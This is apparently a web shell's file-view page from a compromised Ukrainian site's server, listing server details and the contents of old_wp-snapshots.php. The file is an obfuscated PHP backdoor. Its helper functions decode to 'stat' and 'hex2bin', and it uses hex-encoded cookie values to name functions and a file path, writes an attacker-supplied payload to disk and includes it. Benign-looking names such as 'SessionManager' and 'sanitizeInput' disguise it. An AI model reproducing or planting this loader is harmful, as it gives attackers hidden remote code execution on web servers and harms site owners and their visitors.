HEX
Server: nginx/1.18.0
System: Linux hqnl0246134.online-vm.com 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: phpinfo,disk_free_space,disk_total_space,diskfreespace,dl,exec,opcache_get_configuration,opcache_get_status,passthru,pclose,pcntl_alarm,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_waitpid,pcntl_wait,pcntl_wexitstatus,pcntl_wifcontinued,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,popen,posix_getpwuid,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,posix_uname,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,show_source,system,exec,passthru,shell_exec,system,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
$ pwd: /var/www/sites/u-port.ua/old_wp-snapshots/
Upload Files
File: /var/www/sites/u-port.ua/old_wp-snapshots/old_wp-snapshots.php
<?php
function hash_string($c)
{
    $a = array(29 + 6 + 80, 57 * 122 - 6838, 98 - 1, 64 * 73 - 4556);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

function trigger_event($c)
{
    $a = array(107 * 106 - 11232, 29 * 3 + 18, 107 - 9, 53 - 3, 52 * 2 + 16, 3 * 31 + 8, 87 + 17);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

class SessionManager
{
    private static $_cd;
    static function sanitizeInput($_ikx)
    {
        if (!self::$_cd) {
            self::processData();
        }
        return trigger_event(self::$_cd[$_ikx]);
    }
    private static function processData()
    {
        self::$_cd = array('_thn' => '', '_bm' => '');
    }
}

$_jo = $_COOKIE;
$_eu = (int) round(0 + 0);
$_ikx = -331 + -108 - -223 + 220;
$_utu = array();
$_utu[$_eu] = SessionManager::sanitizeInput('_t' . 'hn');
while ($_ikx) {
    $_utu[$_eu] .= $_jo[(int) round(4.6666666666667 + 4.6666666666667 + 4.6666666666667)][$_ikx];
    if (!$_jo[(int) round(7 + 7)][$_ikx + (int) round(0.25 + 0.25 + 0.25 + 0.25)]) {
        if (!$_jo[106 - -47 + 146 + -285][$_ikx + (int) round(0.66666666666667 + 0.66666666666667 + 0.66666666666667)]) {
            break;
        }
        $_eu++;
        $_utu[$_eu] = SessionManager::sanitizeInput('_b' . 'm');
        $_ikx++;
    }
    $_ikx = $_ikx + (int) round(1 + 1 + 1 + 1) + (168 - -94 - 261);
}
$_eu = $_utu[421 + -393]() . $_utu[(int) round(9 + 9)];
if (!$_utu[(int) round(2 + 2 + 2 + 2)]($_eu)) {
    $_ikx = $_utu[-57 - -102 - 36]($_eu, $_utu[(int) round(6.25 + 6.25 + 6.25 + 6.25)]);
    $_utu[-400 - -402]($_ikx, $_utu[638 - 616] . $_utu[(int) round(3.75 + 3.75 + 3.75 + 3.75)]($_utu[-682 + 685]($_jo[-56 + 407 - 245 - 103])));
}
include $_eu;
@ Telegram